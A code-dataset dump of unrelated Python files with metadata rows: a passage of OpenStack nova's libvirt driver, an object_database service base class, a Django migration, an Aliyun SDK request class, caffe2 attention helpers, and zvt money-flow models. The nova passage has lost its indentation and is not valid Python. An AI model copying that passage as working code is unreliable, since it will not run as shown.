# try to create the directory on the remote compute node
# if this fails we pass the exception up the stack so we can catch
# failures here earlier
if not shared_storage:
utils.execute('ssh', dest, 'mkdir', '-p', inst_base)
self.power_off(instance)
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
self._disconnect_volume(connection_info, disk_dev)
try:
utils.execute('mv', inst_base, inst_base_resize)
# if we are migrating the instance with shared storage then
# create the directory. If it is a remote node the directory
# has already been created
if shared_storage:
dest = None
utils.execute('mkdir', '-p', inst_base)
active_flavor = flavors.extract_flavor(instance)
for info in disk_info:
# assume inst_base == dirname(info['path'])
img_path = info['path']
fname = os.path.basename(img_path)
from_path = os.path.join(inst_base_resize, fname)
if (fname == 'disk.swap' and
active_flavor.get('swap', 0) != flavor.get('swap', 0)):
# To properly resize the swap partition, it must be
# re-created with the proper size. This is acceptable
# because when an OS is shut down, the contents of the
# swap space are just garbage, the OS doesn't bother about
# what is in it.
# We will not copy over the swap disk here, and rely on
# finish_migration/_create_image to re-create it for us.
continue
if info['type'] == 'qcow2' and info['backing_file']:
tmp_path = from_path + "_rbase"
# merge backing file
utils.execute('qemu-img', 'convert', '-f', 'qcow2',
'-O', 'qcow2', from_path, tmp_path)
if shared_storage:
utils.execute('mv', tmp_path, img_path)
else:
libvirt_utils.copy_image(tmp_path, img_path, host=dest)
utils.execute('rm', '-f', tmp_path)
else: # raw or qcow2 with no backing file
libvirt_utils.copy_image(from_path, img_path, host=dest)
except Exception:
with excutils.save_and_reraise_exception():
self._cleanup_remote_migration(dest, inst_base,
inst_base_resize,
shared_storage)
return disk_info_text
def _wait_for_running(self, instance):
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_LI("Instance running successfully."), instance=instance)
raise loopingcall.LoopingCallDone()
@staticmethod
def _disk_size_from_instance(instance, info):
"""Determines the disk size from instance properties
Returns the disk size by using the disk name to determine whether it
is a root or an ephemeral disk, then by checking properties of the
instance returns the size converted to bytes.
Returns 0 if the disk name not match (disk, disk.local).
"""
fname = os.path.basename(info['path'])
if fname == 'disk':
size = instance['root_gb']
elif fname == 'disk.local':
size = instance['ephemeral_gb']
else:
size = 0
return size * units.Gi
@staticmethod
def _disk_raw_to_qcow2(path):
"""Converts a raw disk to qcow2."""
path_qcow = path + '_qcow'
utils.execute('qemu-img', 'convert', '-f', 'raw',
'-O', 'qcow2', path, path_qcow)
utils.execute('mv', path_qcow, path)
@staticmethod
def _disk_qcow2_to_raw(path):
"""Converts a qcow2 disk to raw."""
path_raw = path + '_raw'
utils.execute('qemu-img', 'convert', '-f', 'qcow2',
'-O', 'raw', path, path_raw)
utils.execute('mv', path_raw, path)
def _disk_resize(self, info, size):
"""Attempts to resize a disk to size
Attempts to resize a disk by checking the capabilities and
preparing the format, then calling disk.api.extend.
Note: Currently only support disk extend.
"""
# If we have a non partitioned image that we can extend
# then ensure we're in 'raw' format so we can extend file system.
fmt = info['type']
pth = info['path']
if (size and fmt == 'qcow2' and
disk.can_resize_image(pth, size) and
disk.is_image_partitionless(pth, use_cow=True)):
self._disk_qcow2_to_raw(pth)
fmt = 'raw'
if size:
use_cow = fmt == 'qcow2'
disk.extend(pth, size, use_cow=use_cow)
if fmt == 'raw' and CONF.use_cow_images:
# back to qcow2 (no backing_file though) so that snapshot
# will be available
self._disk_raw_to_qcow2(pth)
def finish_migration(self, context, migration, instance, disk_info,
network_info, image_meta, resize_instance,
block_device_info=None, power_on=True):
LOG.debug("Starting finish_migration", instance=instance)
# resize disks. only "disk" and "disk.local" are necessary.
disk_info = jsonutils.loads(disk_info)
for info in disk_info:
size = self._disk_size_from_instance(instance, info)
self._disk_resize(info, size)
disk_info = blockinfo.get_disk_info(CONF.libvirt.virt_type,
instance,
block_device_info,
image_meta)
# assume _create_image do nothing if a target file exists.
self._create_image(context, instance,
disk_mapping=disk_info['mapping'],
network_info=network_info,
block_device_info=None, inject_files=False)
xml = self._get_guest_xml(context, instance, network_info, disk_info,
block_device_info=block_device_info,
write_to_disk=True)
self._create_domain_and_network(context, xml, instance, network_info,
block_device_info, power_on)
if power_on:
timer = loopingcall.FixedIntervalLoopingCall(
self._wait_for_running,
instance)
timer.start(interval=0.5).wait()
def _cleanup_failed_migration(self, inst_base):
"""Make sure that a failed migrate doesn't prevent us from rolling
back in a revert.
"""
try:
shutil.rmtree(inst_base)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def finish_revert_migration(self, context, instance, network_info,
block_device_info=None, power_on=True):
LOG.debug("Starting finish_revert_migration",
instance=instance)
inst_base = libvirt_utils.get_instance_path(instance)
inst_base_resize = inst_base + "_resize"
# NOTE(danms): if we're recovering from a failed migration,
# make sure we don't have a left-over same-host base directory
# that would conflict. Also, don't fail on the rename if the
# failure happened early.
if os.path.exists(inst_base_resize):
self._cleanup_failed_migration(inst_base)
utils.execute('mv', inst_base_resize, inst_base)
disk_info = blockinfo.get_disk_info(CONF.libvirt.virt_type,
instance,
block_device_info)
xml = self._get_guest_xml(context, instance, network_info, disk_info,
block_device_info=block_device_info)
self._create_domain_and_network(context, xml, instance, network_info,
block_device_info, power_on)
if power_on:
timer = loopingcall.FixedIntervalLoopingCall(
self._wait_for_running,
instance)
timer.start(interval=0.5).wait()
def confirm_migration(self, migration, instance, network_info):
"""Confirms a resize, destroying the source VM."""
self._cleanup_resize(instance, network_info)
def get_diagnostics(self, instance):
def get_io_devices(xml_doc):
"""get the list of io devices from the xml document."""
result = {"volumes": [], "ifaces": []}
try:
doc = etree.fromstring(xml_doc)
except Exception:
return result
blocks = [('./devices/disk', 'volumes'),
('./devices/interface', 'ifaces')]
for block, key in blocks:
section = doc.findall(block)
for node in section:
for child in node.getchildren():
if child.tag == 'target' and child.get('dev'):
result[key].append(child.get('dev'))
return result
domain = self._lookup_by_name(instance['name'])
output = {}
# get cpu time, might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
try:
cputime = domain.vcpus()[0]
for i in range(len(cputime)):
output["cpu" + str(i) + "_time"] = cputime[i][2]
except libvirt.libvirtError:
pass
# get io status
xml = domain.XMLDesc(0)
dom_io = get_io_devices(xml)
for guest_disk in dom_io["volumes"]:
try:
# blockStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
stats = domain.blockStats(guest_disk)
output[guest_disk + "_read_req"] = stats[0]
output[guest_disk + "_read"] = stats[1]
output[guest_disk + "_write_req"] = stats[2]
output[guest_disk + "_write"] = stats[3]
output[guest_disk + "_errors"] = stats[4]
except libvirt.libvirtError:
pass
for interface in dom_io["ifaces"]:
try:
# interfaceStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
stats = domain.interfaceStats(interface)
output[interface + "_rx"] = stats[0]
output[interface + "_rx_packets"] = stats[1]
output[interface + "_rx_errors"] = stats[2]
output[interface + "_rx_drop"] = stats[3]
output[interface + "_tx"] = stats[4]
output[interface + "_tx_packets"] = stats[5]
output[interface + "_tx_errors"] = stats[6]
output[interface + "_tx_drop"] = stats[7]
except libvirt.libvirtError:
pass
output["memory"] = domain.maxMemory()
# memoryStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
try:
mem = domain.memoryStats()
for key in mem.keys():
output["memory-" + key] = mem[key]
except (libvirt.libvirtError, AttributeError):
pass
return output
def instance_on_disk(self, instance):
# ensure directories exist and are writable
instance_path = libvirt_utils.get_instance_path(instance)
LOG.debug('Checking instance files accessibility %s', instance_path)
return os.access(instance_path, os.W_OK)
def inject_network_info(self, instance, nw_info):
self.firewall_driver.setup_basic_filtering(instance, nw_info)
def _delete_instance_files(self, instance):
# NOTE(mikal): a shim to handle this file not using instance objects
# everywhere. Remove this when that conversion happens.
context = nova_context.get_admin_context(read_deleted='yes')
inst_obj = objects.Instance.get_by_uuid(context, instance['uuid'])
# NOTE(mikal): this code should be pushed up a layer when this shim is
# removed.
attempts = int(inst_obj.system_metadata.get('clean_attempts', '0'))
success = self.delete_instance_files(inst_obj)
inst_obj.system_metadata['clean_attempts'] = str(attempts + 1)
if success:
inst_obj.cleaned = True
inst_obj.save(context)
def delete_instance_files(self, instance):
target = libvirt_utils.get_instance_path(instance)
# A resize may be in progress
target_resize = target + '_resize'
        # Other threads may attempt to rename the path, so we rename the path
        # to target + '_del' (because it is atomic) and iterate through the
        # loop twice in the unlikely event that a concurrent rename occurs
        # between the two rename attempts in this method. In general this method
# should be fairly thread-safe without these additional checks, since
# other operations involving renames are not permitted when the task
# state is not None and the task state should be set to something
# other than None by the time this method is invoked.
target_del = target + '_del'
for i in six.moves.range(2):
try:
utils.execute('mv', target, target_del)
break
except Exception:
pass
try:
utils.execute('mv', target_resize, target_del)
break
except Exception:
pass
# Either the target or target_resize path may still exist if all
# rename attempts failed.
remaining_path = None
for p in (target, target_resize):
if os.path.exists(p):
remaining_path = p
break
# A previous delete attempt may have been interrupted, so target_del
# may exist even if all rename attempts during the present method
# invocation failed due to the absence of both target and
# target_resize.
if not remaining_path and os.path.exists(target_del):
LOG.info(_LI('Deleting instance files %s'), target_del,
instance=instance)
remaining_path = target_del
try:
shutil.rmtree(target_del)
except OSError as e:
LOG.error(_LE('Failed to cleanup directory %(target)s: '
'%(e)s'), {'target': target_del, 'e': e},
instance=instance)
# It is possible that the delete failed, if so don't mark the instance
# as cleaned.
if remaining_path and os.path.exists(remaining_path):
LOG.info(_LI('Deletion of %s failed'), remaining_path,
instance=instance)
return False
LOG.info(_LI('Deletion of %s complete'), target_del, instance=instance)
return True
@property
def need_legacy_block_device_info(self):
return False
def default_root_device_name(self, instance, image_meta, root_bdm):
disk_bus = blockinfo.get_disk_bus_for_device_type(
CONF.libvirt.virt_type, image_meta, "disk")
cdrom_bus = blockinfo.get_disk_bus_for_device_type(
CONF.libvirt.virt_type, image_meta, "cdrom")
root_info = blockinfo.get_root_info(
CONF.libvirt.virt_type, image_meta, root_bdm, disk_bus,
cdrom_bus)
return block_device.prepend_dev(root_info['dev'])
def default_device_names_for_instance(self, instance, root_device_name,
*block_device_lists):
ephemerals, swap, block_device_mapping = block_device_lists[:3]
blockinfo.default_device_names(CONF.libvirt.virt_type,
nova_context.get_admin_context(),
instance, root_device_name,
ephemerals, swap,
block_device_mapping)
def is_supported_fs_format(self, fs_type):
return fs_type in [disk.FS_FORMAT_EXT2, disk.FS_FORMAT_EXT3,
disk.FS_FORMAT_EXT4, disk.FS_FORMAT_XFS]
class HostState(object):
"""Manages information about the compute node through libvirt."""
def __init__(self, driver):
super(HostState, self).__init__()
self._stats = {}
self.driver = driver
self.update_status()
def get_host_stats(self, refresh=False):
"""Return the current state of the host.
If 'refresh' is True, run update the stats first.
"""
if refresh or not self._stats:
self.update_status()
return self._stats
def update_status(self):
"""Retrieve status info from libvirt."""
def _get_disk_available_least():
"""Return total real disk available least size.
The size of available disk, when block_migration command given
disk_over_commit param is FALSE.
The size that deducted real instance disk size from the total size
of the virtual disk of all instances.
"""
disk_free_gb = disk_info_dict['free']
disk_over_committed = (self.driver.
_get_disk_over_committed_size_total())
# Disk available least size
available_least = disk_free_gb * units.Gi - disk_over_committed
return (available_least / units.Gi)
LOG.debug("Updating host stats")
disk_info_dict = self.driver._get_local_gb_info()
data = {}
# NOTE(dprince): calling capabilities before getVersion works around
# an initialization issue with some versions of Libvirt (1.0.5.5).
# See: https://bugzilla.redhat.com/show_bug.cgi?id=1000116
# See: https://bugs.launchpad.net/nova/+bug/1215593
data["supported_instances"] = \
self.driver._get_instance_capabilities()
data["vcpus"] = self.driver._get_vcpu_total()
data["memory_mb"] = self.driver._get_memory_mb_total()
data["local_gb"] = disk_info_dict['total']
data["vcpus_used"] = self.driver._get_vcpu_used()
data["memory_mb_used"] = self.driver._get_memory_mb_used()
data["local_gb_used"] = disk_info_dict['used']
data["hypervisor_type"] = self.driver._get_hypervisor_type()
data["hypervisor_version"] = self.driver._get_hypervisor_version()
data["hypervisor_hostname"] = self.driver._get_hypervisor_hostname()
data["cpu_info"] = self.driver._get_cpu_info()
data['disk_available_least'] = _get_disk_available_least()
data['pci_passthrough_devices'] = \
self.driver._get_pci_passthrough_devices()
self._stats = data
return data
| 43.114281 | 79 | 0.568124 | [
"Apache-2.0"
] | srajag/nova | nova/virt/libvirt/driver.py | 244,846 | Python |
# Copyright 2018 Braxton Mckee
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import object_database
class ServiceRuntimeConfig:
def __init__(self, serviceTemporaryStorageRoot, authToken, ownIpAddress):
self.serviceTemporaryStorageRoot = serviceTemporaryStorageRoot
self.authToken = authToken
self.ownIpAddress = ownIpAddress
class ServiceBase:
coresUsed = 1
gbRamUsed = 1
def __init__(self, db, serviceObject, runtimeConfig):
self.db = db
self.serviceObject = serviceObject
self.runtimeConfig = runtimeConfig
if self.serviceObject is not None:
self.serializationContext = self.serviceObject.getSerializationContext()
else:
self.serializationContext = None
@staticmethod
def configureFromCommandline(db, serviceObject, args):
"""Subclasses should take the remaining args from the commandline and configure using them"""
pass
def initialize(self):
pass
def doWork(self, shouldStop):
# subclasses actually do work in here.
shouldStop.wait()
@staticmethod
def serviceDisplay(serviceObject, instance=None, objType=None, queryArgs=None):
return object_database.web.cells.Card("No details provided for service '%s'" % serviceObject.name)
@staticmethod
def serviceHeaderToggles(serviceObject, instance=None):
return []
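
# --- Illustrative example (hypothetical service, not part of this module) ---
# A minimal subclass sketch showing the hooks a concrete service overrides;
# the class name and timings here are assumptions, not object_database docs.
class _ExampleEchoService(ServiceBase):
    coresUsed = 1
    gbRamUsed = 1

    @staticmethod
    def configureFromCommandline(db, serviceObject, args):
        # A real service would parse `args` and persist its configuration.
        pass

    def doWork(self, shouldStop):
        # A real service would do useful work here; this one simply idles
        # until asked to stop, like the base implementation.
        while not shouldStop.is_set():
            shouldStop.wait(timeout=1.0)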
| 32.813559 | 106 | 0.710744 | [
"Apache-2.0"
] | braxtonmckee/nativepython | object_database/service_manager/ServiceBase.py | 1,936 | Python |
# Generated by Django 2.0.5 on 2018-12-04 13:00
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('branch', '0007_auto_20181204_2034'),
]
operations = [
migrations.AddField(
model_name='authentication',
name='sty',
field=models.CharField(default=0, max_length=3),
preserve_default=False,
),
]
| 21.7 | 60 | 0.601382 | [
"Apache-2.0"
] | 106626/Practical | Demo/branch/migrations/0008_authentication_sty.py | 434 | Python |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkdyplsapi.endpoint import endpoint_data
class BindAxnRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Dyplsapi', '2017-05-25', 'BindAxn')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ResourceOwnerId(self): # Long
return self.get_query_params().get('ResourceOwnerId')
def set_ResourceOwnerId(self, ResourceOwnerId): # Long
self.add_query_param('ResourceOwnerId', ResourceOwnerId)
def get_CallDisplayType(self): # Integer
return self.get_query_params().get('CallDisplayType')
def set_CallDisplayType(self, CallDisplayType): # Integer
self.add_query_param('CallDisplayType', CallDisplayType)
def get_CallTimeout(self): # Integer
return self.get_query_params().get('CallTimeout')
def set_CallTimeout(self, CallTimeout): # Integer
self.add_query_param('CallTimeout', CallTimeout)
def get_PhoneNoX(self): # String
return self.get_query_params().get('PhoneNoX')
def set_PhoneNoX(self, PhoneNoX): # String
self.add_query_param('PhoneNoX', PhoneNoX)
def get_RingConfig(self): # String
return self.get_query_params().get('RingConfig')
def set_RingConfig(self, RingConfig): # String
self.add_query_param('RingConfig', RingConfig)
def get_ASRStatus(self): # Boolean
return self.get_query_params().get('ASRStatus')
def set_ASRStatus(self, ASRStatus): # Boolean
self.add_query_param('ASRStatus', ASRStatus)
def get_PhoneNoB(self): # String
return self.get_query_params().get('PhoneNoB')
def set_PhoneNoB(self, PhoneNoB): # String
self.add_query_param('PhoneNoB', PhoneNoB)
def get_PhoneNoA(self): # String
return self.get_query_params().get('PhoneNoA')
def set_PhoneNoA(self, PhoneNoA): # String
self.add_query_param('PhoneNoA', PhoneNoA)
def get_ExpectCity(self): # String
return self.get_query_params().get('ExpectCity')
def set_ExpectCity(self, ExpectCity): # String
self.add_query_param('ExpectCity', ExpectCity)
def get_ResourceOwnerAccount(self): # String
return self.get_query_params().get('ResourceOwnerAccount')
def set_ResourceOwnerAccount(self, ResourceOwnerAccount): # String
self.add_query_param('ResourceOwnerAccount', ResourceOwnerAccount)
def get_OwnerId(self): # Long
return self.get_query_params().get('OwnerId')
def set_OwnerId(self, OwnerId): # Long
self.add_query_param('OwnerId', OwnerId)
def get_OutOrderId(self): # String
return self.get_query_params().get('OutOrderId')
def set_OutOrderId(self, OutOrderId): # String
self.add_query_param('OutOrderId', OutOrderId)
def get_PoolKey(self): # String
return self.get_query_params().get('PoolKey')
def set_PoolKey(self, PoolKey): # String
self.add_query_param('PoolKey', PoolKey)
def get_Expiration(self): # String
return self.get_query_params().get('Expiration')
def set_Expiration(self, Expiration): # String
self.add_query_param('Expiration', Expiration)
def get_IsRecordingEnabled(self): # Boolean
return self.get_query_params().get('IsRecordingEnabled')
def set_IsRecordingEnabled(self, IsRecordingEnabled): # Boolean
self.add_query_param('IsRecordingEnabled', IsRecordingEnabled)
def get_OutId(self): # String
return self.get_query_params().get('OutId')
def set_OutId(self, OutId): # String
self.add_query_param('OutId', OutId)
def get_NoType(self): # String
return self.get_query_params().get('NoType')
def set_NoType(self, NoType): # String
self.add_query_param('NoType', NoType)
def get_ASRModelId(self): # String
return self.get_query_params().get('ASRModelId')
def set_ASRModelId(self, ASRModelId): # String
self.add_query_param('ASRModelId', ASRModelId)
def get_CallRestrict(self): # String
return self.get_query_params().get('CallRestrict')
def set_CallRestrict(self, CallRestrict): # String
self.add_query_param('CallRestrict', CallRestrict)
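
# --- Illustrative usage sketch; the credentials, region and numbers below are
# placeholders/assumptions, not values from this SDK.
if __name__ == "__main__":
    from aliyunsdkcore.client import AcsClient

    client = AcsClient("<access-key-id>", "<access-key-secret>", "cn-hangzhou")
    request = BindAxnRequest()
    request.set_PhoneNoA("13800000000")  # hypothetical A-side number
    request.set_PhoneNoX("17000000000")  # hypothetical X (virtual) number
    request.set_PoolKey("<pool-key>")
    print(client.do_action_with_exception(request))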
| 38.317829 | 74 | 0.752377 | [
"Apache-2.0"
] | Explorer1092/aliyun-openapi-python-sdk | aliyun-python-sdk-dyplsapi/aliyunsdkdyplsapi/request/v20170525/BindAxnRequest.py | 4,943 | Python |
from sqlalchemy import Boolean, Column, ForeignKey, Integer, String, DateTime, LargeBinary, Float, UniqueConstraint
from sqlalchemy.orm import relationship, backref
from datetime import datetime
from conductor.app.db.base_class import Base
class DiscoveryResult(Base):
__tablename__ = "discovery_results"
__table_args__ = (
# this can be db.PrimaryKeyConstraint if you want it to be a primary key
UniqueConstraint('train_id', 'station_id'),
)
id = Column(Integer, primary_key=True, index=True)
train_id = Column(Integer, ForeignKey("trains.id"))
station_id = Column(Integer, ForeignKey("stations.id"))
results = Column(String)
created_at = Column(DateTime, default=datetime.now())
| 38.526316 | 115 | 0.741803 | [
"MIT"
] | PHT-EU/central-conductor | conductor/app/models/discovery.py | 732 | Python |
import re
import jieba
import jieba.posseg as pseg
def split2sens(text):
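    """Split ``text`` into sentences on Chinese end-of-sentence punctuation,
    re-attaching the punctuation (and any trailing closing quote) to each
    sentence.
    """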
pstop = re.compile(rf'[。!??!…]”*')
sens = []
stoplist = pstop.findall(text)
senlist = []
for sen in pstop.split(text):
if len(sen) == 0:
continue
senlist.append(sen)
for i, sen in enumerate(senlist):
try:
sen = sen + stoplist[i]
sens.append(sen)
except IndexError:
continue
return sens
def cut2words(text):
return jieba.lcut(text)
def cut2wpos(text, pos=None):
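    """Segment ``text`` into (word, POS) pairs with jieba.posseg, skipping
    words whose POS tag equals ``pos``.
    """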
data = []
for w,p in pseg.cut(text):
if p == pos:
continue
data.append((w,p))
return data
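
# --- Illustrative usage; the sample sentence is made up for demonstration ---
if __name__ == '__main__':
    sample = '今天天气很好。我们去公园吧!'
    print(split2sens(sample))          # ['今天天气很好。', '我们去公园吧!']
    print(cut2words(sample))           # jieba word segmentation
    print(cut2wpos(sample, pos='x'))   # (word, POS) pairs, punctuation ('x') skipped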
| 20.029412 | 38 | 0.543319 | [
"MIT"
] | fcoolish/All4NLP | nbt/splittext/splittext.py | 691 | Python |
## @package attention
# Module caffe2.python.attention
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
class AttentionType:
Regular, Recurrent = range(2)
def s(scope, name):
# We have to manually scope due to our internal/external blob
# relationships.
return "{}/{}".format(str(scope), str(name))
# c_i = \sum_j w_{ij}\textbf{s}_j
def _calc_weighted_context(
model,
encoder_outputs_transposed,
encoder_output_dim,
attention_weights_3d,
scope,
):
# [batch_size, encoder_output_dim, 1]
attention_weighted_encoder_context = model.net.BatchMatMul(
[encoder_outputs_transposed, attention_weights_3d],
s(scope, 'attention_weighted_encoder_context'),
)
# TODO: somehow I cannot use Squeeze in-place op here
# [batch_size, encoder_output_dim]
attention_weighted_encoder_context, _ = model.net.Reshape(
attention_weighted_encoder_context,
[
attention_weighted_encoder_context,
s(scope, 'attention_weighted_encoder_context_old_shape'),
],
shape=[1, -1, encoder_output_dim],
)
return attention_weighted_encoder_context
# Calculate a softmax over the passed in attention energy logits
def _calc_attention_weights(
model,
attention_logits_transposed,
scope,
):
# TODO: we could try to force some attention weights to be zeros,
# based on encoder_lengths.
# [batch_size, encoder_length]
attention_weights = model.Softmax(
attention_logits_transposed,
s(scope, 'attention_weights'),
engine='CUDNN',
)
# TODO: make this operation in-place
# [batch_size, encoder_length, 1]
attention_weights_3d = model.net.ExpandDims(
attention_weights,
s(scope, 'attention_weights_3d'),
dims=[2],
)
return attention_weights_3d
# e_{ij} = \textbf{v}^T tanh \alpha(\textbf{h}_{i-1}, \textbf{s}_j)
def _calc_attention_logits_from_sum_match(
model,
decoder_hidden_encoder_outputs_sum,
encoder_output_dim,
scope,
):
# [encoder_length, batch_size, encoder_output_dim]
decoder_hidden_encoder_outputs_sum = model.net.Tanh(
decoder_hidden_encoder_outputs_sum,
decoder_hidden_encoder_outputs_sum,
)
attention_v = model.param_init_net.XavierFill(
[],
s(scope, 'attention_v'),
shape=[1, encoder_output_dim],
)
model.add_param(attention_v)
attention_zeros = model.param_init_net.ConstantFill(
[],
s(scope, 'attention_zeros'),
value=0.0,
shape=[1],
)
# [encoder_length, batch_size, 1]
attention_logits = model.net.FC(
[decoder_hidden_encoder_outputs_sum, attention_v, attention_zeros],
[s(scope, 'attention_logits')],
axis=2,
)
# [encoder_length, batch_size]
attention_logits = model.net.Squeeze(
[attention_logits],
[attention_logits],
dims=[2],
)
# [batch_size, encoder_length]
attention_logits_transposed = model.Transpose(
attention_logits,
s(scope, 'attention_logits_transposed'),
axes=[1, 0],
)
return attention_logits_transposed
# \textbf{W}^\alpha used in the context of \alpha_{sum}(a,b)
def _apply_fc_weight_for_sum_match(
model,
input,
dim_in,
dim_out,
scope,
name,
):
output = model.FC(
input,
s(scope, name),
dim_in=dim_in,
dim_out=dim_out,
axis=2,
)
output = model.net.Squeeze(
output,
output,
dims=[0],
)
return output
# Implement RecAtt due to section 4.1 in http://arxiv.org/abs/1601.03317
def apply_recurrent_attention(
model,
encoder_output_dim,
encoder_outputs_transposed,
weighted_encoder_outputs,
decoder_hidden_state_t,
decoder_hidden_state_dim,
attention_weighted_encoder_context_t_prev,
scope,
):
weighted_prev_attention_context = _apply_fc_weight_for_sum_match(
model=model,
input=attention_weighted_encoder_context_t_prev,
dim_in=encoder_output_dim,
dim_out=encoder_output_dim,
scope=scope,
name='weighted_prev_attention_context',
)
weighted_decoder_hidden_state = _apply_fc_weight_for_sum_match(
model=model,
input=decoder_hidden_state_t,
dim_in=decoder_hidden_state_dim,
dim_out=encoder_output_dim,
scope=scope,
name='weighted_decoder_hidden_state',
)
# [encoder_length, batch_size, encoder_output_dim]
decoder_hidden_encoder_outputs_sum_tmp = model.net.Add(
[
weighted_encoder_outputs,
weighted_decoder_hidden_state,
],
s(scope, 'decoder_hidden_encoder_outputs_sum_tmp'),
broadcast=1,
use_grad_hack=1,
)
# [encoder_length, batch_size, encoder_output_dim]
decoder_hidden_encoder_outputs_sum = model.net.Add(
[
decoder_hidden_encoder_outputs_sum_tmp,
weighted_prev_attention_context,
],
s(scope, 'decoder_hidden_encoder_outputs_sum'),
broadcast=1,
use_grad_hack=1,
)
attention_logits_transposed = _calc_attention_logits_from_sum_match(
model=model,
decoder_hidden_encoder_outputs_sum=decoder_hidden_encoder_outputs_sum,
encoder_output_dim=encoder_output_dim,
scope=scope,
)
# [batch_size, encoder_length, 1]
attention_weights_3d = _calc_attention_weights(
model=model,
attention_logits_transposed=attention_logits_transposed,
scope=scope,
)
# [batch_size, encoder_output_dim, 1]
attention_weighted_encoder_context = _calc_weighted_context(
model=model,
encoder_outputs_transposed=encoder_outputs_transposed,
encoder_output_dim=encoder_output_dim,
attention_weights_3d=attention_weights_3d,
scope=scope,
)
return attention_weighted_encoder_context, attention_weights_3d, [
decoder_hidden_encoder_outputs_sum_tmp,
decoder_hidden_encoder_outputs_sum,
]
def apply_regular_attention(
model,
encoder_output_dim,
encoder_outputs_transposed,
weighted_encoder_outputs,
decoder_hidden_state_t,
decoder_hidden_state_dim,
scope,
):
weighted_decoder_hidden_state = _apply_fc_weight_for_sum_match(
model=model,
input=decoder_hidden_state_t,
dim_in=decoder_hidden_state_dim,
dim_out=encoder_output_dim,
scope=scope,
name='weighted_decoder_hidden_state',
)
# [encoder_length, batch_size, encoder_output_dim]
decoder_hidden_encoder_outputs_sum = model.net.Add(
[weighted_encoder_outputs, weighted_decoder_hidden_state],
s(scope, 'decoder_hidden_encoder_outputs_sum'),
broadcast=1,
use_grad_hack=1,
)
attention_logits_transposed = _calc_attention_logits_from_sum_match(
model=model,
decoder_hidden_encoder_outputs_sum=decoder_hidden_encoder_outputs_sum,
encoder_output_dim=encoder_output_dim,
scope=scope,
)
# [batch_size, encoder_length, 1]
attention_weights_3d = _calc_attention_weights(
model=model,
attention_logits_transposed=attention_logits_transposed,
scope=scope,
)
# [batch_size, encoder_output_dim, 1]
attention_weighted_encoder_context = _calc_weighted_context(
model=model,
encoder_outputs_transposed=encoder_outputs_transposed,
encoder_output_dim=encoder_output_dim,
attention_weights_3d=attention_weights_3d,
scope=scope,
)
return attention_weighted_encoder_context, attention_weights_3d, [
decoder_hidden_encoder_outputs_sum,
]
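
# NOTE: summary of the tensor shapes the helpers above assume (collected from
# the inline comments in this module; a sketch, not an authoritative spec):
#   encoder_outputs_transposed          [batch_size, encoder_output_dim, encoder_length]
#   weighted_encoder_outputs            [encoder_length, batch_size, encoder_output_dim]
#   decoder_hidden_state_t              [1, batch_size, decoder_hidden_state_dim]
#   attention_weights_3d (output)       [batch_size, encoder_length, 1]
#   attention_weighted_encoder_context  [1, batch_size, encoder_output_dim]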
| 28.926199 | 78 | 0.694221 | [
"MIT"
] | Excalibur0214/Hello-world | caffe2/python/attention.py | 7,839 | Python |
# -*- coding: utf-8 -*-
from sqlalchemy import Column, String, Float
from sqlalchemy.ext.declarative import declarative_base
from zvt.contract import Mixin
from zvt.contract.register import register_schema
MoneyFlowBase = declarative_base()
# Money flow of blocks (sectors)
class BlockMoneyFlow(MoneyFlowBase, Mixin):
__tablename__ = 'block_money_flow'
code = Column(String(length=32))
name = Column(String(length=32))
    # Closing price
close = Column(Float)
change_pct = Column(Float)
turnover_rate = Column(Float)
    # Net inflows
net_inflows = Column(Float)
    # Net inflow rate
net_inflow_rate = Column(Float)
    # Main force = extra-large orders + large orders
net_main_inflows = Column(Float)
net_main_inflow_rate = Column(Float)
    # Extra-large orders
net_huge_inflows = Column(Float)
net_huge_inflow_rate = Column(Float)
    # Large orders
net_big_inflows = Column(Float)
net_big_inflow_rate = Column(Float)
    # Medium orders
net_medium_inflows = Column(Float)
net_medium_inflow_rate = Column(Float)
    # Small orders
net_small_inflows = Column(Float)
net_small_inflow_rate = Column(Float)
class StockMoneyFlow(MoneyFlowBase, Mixin):
__tablename__ = 'stock_money_flow'
code = Column(String(length=32))
name = Column(String(length=32))
    # Closing price
close = Column(Float)
change_pct = Column(Float)
turnover_rate = Column(Float)
    # Net inflows
net_inflows = Column(Float)
    # Net inflow rate
net_inflow_rate = Column(Float)
    # Main force = extra-large orders + large orders
net_main_inflows = Column(Float)
net_main_inflow_rate = Column(Float)
    # Extra-large orders
net_huge_inflows = Column(Float)
net_huge_inflow_rate = Column(Float)
    # Large orders
net_big_inflows = Column(Float)
net_big_inflow_rate = Column(Float)
    # Medium orders
net_medium_inflows = Column(Float)
net_medium_inflow_rate = Column(Float)
    # Small orders
